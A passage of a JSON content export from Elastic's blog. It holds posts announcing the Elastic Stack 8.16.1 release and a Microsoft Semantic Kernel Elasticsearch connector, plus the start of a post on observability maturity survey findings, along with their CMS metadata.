data.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs49ddf3e2ac8be6b0"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csabe409cb7b2eec4f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs59102953ba3154f5"}}}],"publish_date":"2024-11-22","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt3184f3496194138e","ACL":{},"created_at":"2023-11-06T20:36:32.173Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-support","label_l10n":"Customer support","tags":[],"title":"Customer support","updated_at":"2023-11-06T20:36:32.173Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.257Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt1573247eba19e1e4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-21T00:50:18.640Z","created_by":"bltb6c155cd84fc0c1a","file_size":"68554","filename":"serverless-launch-blog-image_(2).jpg","parent_uid":null,"tags":[],"title":"serverless-launch-blog-image (2).jpg","updated_at":"2024-11-21T00:50:18.640Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.143Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1573247eba19e1e4/673e83ca52ea4682e5070a48/serverless-launch-blog-image_(2).jpg"},"title":"Connect a custom AWS S3 snapshot repository to Elastic Cloud","title_l10n":"Connect a custom AWS S3 snapshot repository to Elastic Cloud","updated_at":"2024-11-22T14:48:55.227Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/custom-aws-s3-snapshot-repository-elastic-cloud","publish_details":{"time":"2024-11-22T14:49:00.554Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2380a65eeced3a4c","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["blt90490b0faeaa76cf"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-20T15:59:30.567Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 8.16.1 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 8.16.1 over the previous version 8.16.\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.16/new.html).\n","modular_blocks":[],"publish_date":"2024-11-22","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt38a6c014d6bd5ecb","ACL":{},"created_at":"2021-06-02T15:27:49.854Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"stack","label_l10n":"Stack","tags":[],"title":"Stack","updated_at":"2021-07-13T22:00:22.378Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.258Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt720a36f34ba37235","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-08T02:19:40.632Z","updated_at":"2024-04-08T02:19:40.632Z","content_type":"image/png","file_size":"59668","filename":"Patch_release_white.png","title":"Patch_release_white.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-08T20:16:44.015Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt720a36f34ba37235/6613543c0d99458bb1031dca/Patch_release_white.png"},"title":"Elastic Stack 8.16.1 released","title_l10n":" Elastic Stack 8.16.1 released ","updated_at":"2024-11-22T12:44:33.007Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-16-1-released","publish_details":{"time":"2024-11-22T12:44:50.747Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blte796db9fc1cb8e30","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"We are excited to announce the Semantic Kernel Elasticsearch vector store connector for developers building AI agents using Microsoft Semantic Kernel to use Elasticsearch as a scalable enterprise-grade vector store.","author":["blt63f859889529126a"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-18T03:23:40.736Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs82dfdf4d4fd673b6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eIn collaboration with the Microsoft Semantic Kernel team, we are announcing the availability of \u003c/span\u003e\u003ca href=\"https://github.com/elastic/semantic-kernel-net\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eSemantic Kernel Elasticsearch Vector Store connector\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e for \u003c/span\u003e\u003ca href=\"https://learn.microsoft.com/en-us/semantic-kernel/overview/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eMicrosoft Semantic Kernel\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e (.NET) users. Semantic Kernel simplifies building enterprise-grade AI agents, including the capability to enhance large language models (LLMs) with more relevant, data-driven responses from a vector store. Semantic Kernel provides an abstraction layer for interacting with various vector stores like Elasticsearch, offering essential features, such as creating, listing, and deleting records.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eWith Elasticsearch now available as an \u003c/span\u003e\u003ca href=\"https://learn.microsoft.com/en-us/semantic-kernel/concepts/vector-store-connectors/out-of-the-box-connectors/elasticsearch-connector?pivots=programming-language-csharp\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eout-of-the-box\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e connector, Semantic Kernel developers can seamlessly plug in the Elasticsearch vector database with their new or existing AI agents using \u003c/span\u003e\u003ca href=\"https://github.com/elastic/semantic-kernel-net\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eSemantic Kernel Elasticsearch vector store connector\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Microsoft Semantic Kernel and Elasticsearch ","_metadata":{"uid":"cs828876c5a9e47354"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eSemantic Kernel offers developers a flexible framework for building AI agents that enhance LLMs with custom workflows and data. It enables developers to build context-aware, intelligent agents by providing tools for memory storage, skill management, and orchestration across various tasks. With its support for modular and extensible plugins, Semantic Kernel can be adapted to a wide range of applications, making it a great choice for creating robust, scalable AI agents.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eThe Elasticsearch vector database is essential for developers building AI agents with Microsoft Semantic Kernel as it provides efficient storage, retrieval, and similarity search for high-dimensional data, such as embeddings. In Semantic Kernel — which enables AI agents to process and interpret complex text data — Elasticsearch allows for quick access to similar or related concepts, boosting relevance in search and retrieval tasks. This is critical for applications like recommendation engines, question-answering, or context-aware responses, where AI agents need to handle large amounts of unstructured data and serve accurate results in real time. Elasticsearch vector database allows developers building Semantic Kernel-powered agents to manage large data sets with robust indexing and scalability\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eElasticsearch has strong roots in the open source community, recently adding the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-is-open-source-again\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAGPL license\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e. With the open source availability of Microsoft Semantic Kernel, this creates a powerful combination of enterprise-ready tools. This setup supports building AI agents for production workloads that are adaptable to various deployment and licensing needs.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd36a7dc7b5eef2e5"}}},{"quotes":{"quote_l10n":"We are excited to collaborate with Elasticsearch to empower enterprises by integrating their cutting-edge technology with Microsoft Semantic Kernel. This partnership enables current Elasticsearch customers to leverage their existing investments and rapidly harness the power of AI with Semantic Kernel.","_metadata":{"uid":"cs6ba53d94bc764af0"},"quote_author_l10n":"Evan Chaki, GM, AI Innovation at Microsoft","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8695b933c67efe37"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eYou can quickly get started with Elasticsearch locally using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/run-elasticsearch-locally.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estart-local\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e for experimentation and move to Elastic Cloud for low-cost infrastructure or on-prem deployment. Whether you’re working with a local, self-hosted, or cloud hosted instance of Elasticsearch, Semantic Kernel’s integration makes using Elasticsearch with Semantic kernel effortless.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003eThe Elasticsearch Connector can be used against \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/serverless/current/intro.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eServerless\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e or 8.x versions (signup for \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?onboarding_token=vectorsearch\u0026utm_source=semantickernel\u0026utm_content=documentation\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e). The connector is valuable not only for basic storage and retrieval use cases but also potentially for future advanced applications. Elasticsearch users have had access to great hybrid search, such as RRF in retrievers (\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-search-8-16-0#hybrid-conversational-search,-more-tools-without-the-complexity\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003enow GA in 8.16\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(22, 22, 22);font-size: 12pt;\"\u003e). As Semantic Kernel expands its support for sophisticated features in the future, the full suite of what Elastic has to offer will be fully manifested in the Semantic Kernel experience.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"},{"title_l10n":"What's next?","_metadata":{"uid":"csed41fc2c583b31ca"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStay tuned for upcoming Semantic Kernel Elasticsearch connectors for Python and Java in the coming months.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe’re thrilled to partner with Microsoft to bring features like \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/tutorials/search-tutorial/vector-search/hybrid-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehybrid search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and advanced retrieval strategies to Semantic Kernel developers in the near future.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs52dffa1440949d6a"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa5a21e5431321672"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbdfb96d7d40ef291"}}}],"publish_date":"2024-11-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Elasticsearch vector database and vector store with default quantization on vector data for Microsoft Semantic Kernel","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt3fe97f258a498452","_version":1,"title":"142234 - Blog header image Bridging IT intelligence and business-02.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-18T03:23:39.270Z","updated_at":"2024-11-18T03:23:39.270Z","content_type":"image/jpeg","file_size":"187329","filename":"142234_-_Blog_header_image_Bridging_IT_intelligence_and_business-02.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-20T15:44:46.625Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3fe97f258a498452/673ab33b0b1a4253189efa09/142234_-_Blog_header_image_Bridging_IT_intelligence_and_business-02.jpg"},"title":"Announcing the Microsoft Semantic Kernel Elasticsearch connector","title_l10n":"Announcing the Microsoft Semantic Kernel Elasticsearch connector","updated_at":"2024-11-21T19:12:07.248Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/microsoft-semantic-kernel-elasticsearch","publish_details":{"time":"2024-11-21T19:12:12.441Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt27791ebbb16359ac","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"Modern observability can be a challenge for organizations, but the benefits and improvements are measurable. Find out what the industry is seeing today and why observability maturity matters.","author":["bltd516a87082210f90"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-18T20:56:06.254Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc47a9dcf2fa80c84"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat separates the observability experts from the novices? It's a question that's been on my mind lately, especially after diving into our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003e\u003cspan style='font-size: 12pt;'\u003erecent 2024 State of Observability Survey\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e of over 500 practitioners. In my past roles as a DevOps engineer and a site reliability engineer (SRE), I've seen firsthand how a mature observability practice can be the difference between sleepless nights and smooth sailing.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the first part of this blog, let’s look at insights into how the industry is doing in terms of observability maturity and the possible payoffs you might expect. In part two, we will deal with the challenges preventing teams from getting to observability maturity, practical advice on how to get there, and finally, the role of leadership in supporting team efforts to reach maturity and higher performance.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLet's unpack what the data tells us and explore how to level up observability maturity.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The observability maturity spectrum ","_metadata":{"uid":"csd9657e64146d55ca"},"header_style":"H2","paragraph_l10n":""}],"_metadata":{"uid":"cs47ca7193568e21d0"}}},{"image":{"image":{"uid":"blt0f68b82e672e4b74","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T20:55:16.481Z","created_by":"bltb6c155cd84fc0c1a","file_size":"591905","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-18T20:55:16.481Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T15:00:01.318Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0f68b82e672e4b74/673ba9b480c1bfb2ea4d4405/image2.png"},"_metadata":{"uid":"cs89dc271ba168286f"},"caption_l10n":"","alt_text_l10n":"The observability maturity spectrum ","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1b7f4ea150b9a439"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFirst, let's look at the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\" target=\"_self\"\u003e\u003cspan style='font-size: 12pt;'\u003e2024 State of Observability survey\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and see where the industry stands in terms of maturity:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnly 7% classify themselves as experts\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e36% consider their practice mature\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e43% are in the process of improving\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e15% are in the early stages\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Expert teams make data-driven decisions","_metadata":{"uid":"csbece26e653103fcf"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe vast majority of teams find themselves still climbing the maturity ladder with a mere 7% of organizations considering themselves experts in the field. These pioneers have mastered not only the technical aspects of observability but also successfully embedding it into their organizational culture — making data-driven decisions a default rather than an aspiration.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat's particularly interesting is that just over a third of organizations — specifically 36% — consider their practice mature. These teams have established solid foundations but recognize there's still room for growth. They've typically mastered the basics of collecting telemetry data across their systems, implemented robust alerting mechanisms, and established clear incident response procedures. The next step for these organizations often involves deepening their analysis capabilities and automating more of their observability workflows.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe largest segment — representing 43% of organizations — finds themselves in the midst of their observability journey. These teams are actively working to enhance their capabilities, and this is where some of the most exciting transformations occur. Success at this stage often comes from focusing on key fundamentals: establishing consistent logging practices across services, implementing distributed tracing to understand service dependencies, and developing clear metrics that align with business objectives. A crucial step for these teams is often the implementation of service level objectives (SLOs) that bridge the gap between technical metrics and business impact.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor those just starting out — representing 15% of organizations — the path ahead offers unique opportunities. While it might feel overwhelming, starting fresh allows you to build on modern best practices from day one. Begin with the basics: identify your most critical services, implement comprehensive logging, and establish baseline metrics for performance and reliability. Focus on building a culture that values observability by involving developers early in the process and making observability a key part of your definition of what’s done for new features. Of particular interest to this group would be starting out with a solid data collection strategy using OpenTelemetry and open standards — a place where more mature organizations would no doubt love to be.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Evolve, learn, and adapt","_metadata":{"uid":"cs890b9a7e25fa811a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe beauty of this maturity spectrum lies in its dynamic nature. Organizations aren't static in their position — they're constantly evolving, learning, and adapting. A key strategy for advancement is to focus on incremental improvements: start with one critical service, perfect your observability practices there, and then expand to others. Build a clear taxonomy for your telemetry data early on — consistent naming conventions and metadata tagging will pay dividends as your systems grow more complex.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat's particularly encouraging is the tangible impact that progressing along this spectrum can have on an organization's operational efficiency and reliability. Teams that successfully advance their observability maturity often report dramatic improvements in their ability to detect and resolve issues before they impact users. They're able to make data-driven decisions about capacity planning, performance optimizations, and architectural changes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe path to higher maturity often involves breaking down silos between development and operations teams. Shared dashboards, collaborative incident post-mortems involving AI, and joint ownership of observability tools can help create a unified approach to system reliability. Consider implementing regular \"observability days\" where teams can focus on improving their monitoring and alerting configurations or establish \"reliability champions\" who can help spread best practices across different teams. Good observability is as much about your people as it is about your technology.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The ongoing journey to observability maturity","_metadata":{"uid":"csd0ceebd2c96d4f0d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe key takeaway? No matter where you currently stand on this spectrum, you're part of a larger community working toward the same goal: better, more observable systems that enable us to deliver reliable, performant services to our users. Start where you are; focus on steady progress rather than perfection; try to get the most out of the tools you have; and remember that every improvement in your observability practice brings you closer to more reliable and manageable systems. The journey to observability maturity is exactly that — a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ejourney\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, not a destination.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, if you're in that 15% or 43%, don't worry — you're in good company. The journey to observability maturity is ongoing for most of us. But here's the kicker: the benefits of moving up the maturity ladder are substantial.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The payoff of observability maturity","_metadata":{"uid":"cs7e1f6c74bb938fb1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe survey revealed some eye-opening statistics:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e78% of mature/expert organizations can typically identify root causes of issues compared to only 35% of early-stage organizations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMature practices are half as likely to hear about issues from users first (24% versus 34% for early-stage organizations).\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e50% of mature/expert teams find cloud technologies easier to manage versus only 17% of early-stage teams.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe numbers around observability maturity paint a compelling picture that many SREs will find both validating and motivating. Our observability maturity data has revealed some fascinating insights into how organizational maturity in observability translates to tangible operational benefits.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0021c3543f19aef3"}}},{"image":{"image":{"uid":"bltcc73f7cca6c1bdba","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T20:55:34.013Z","created_by":"bltb6c155cd84fc0c1a","file_size":"846278","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-18T20:55:34.013Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T15:00:01.249Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcc73f7cca6c1bdba/673ba9c6547e54af2d1ec42d/image1.png"},"_metadata":{"uid":"csde8856c754e27646"},"caption_l10n":"","alt_text_l10n":"root causes and 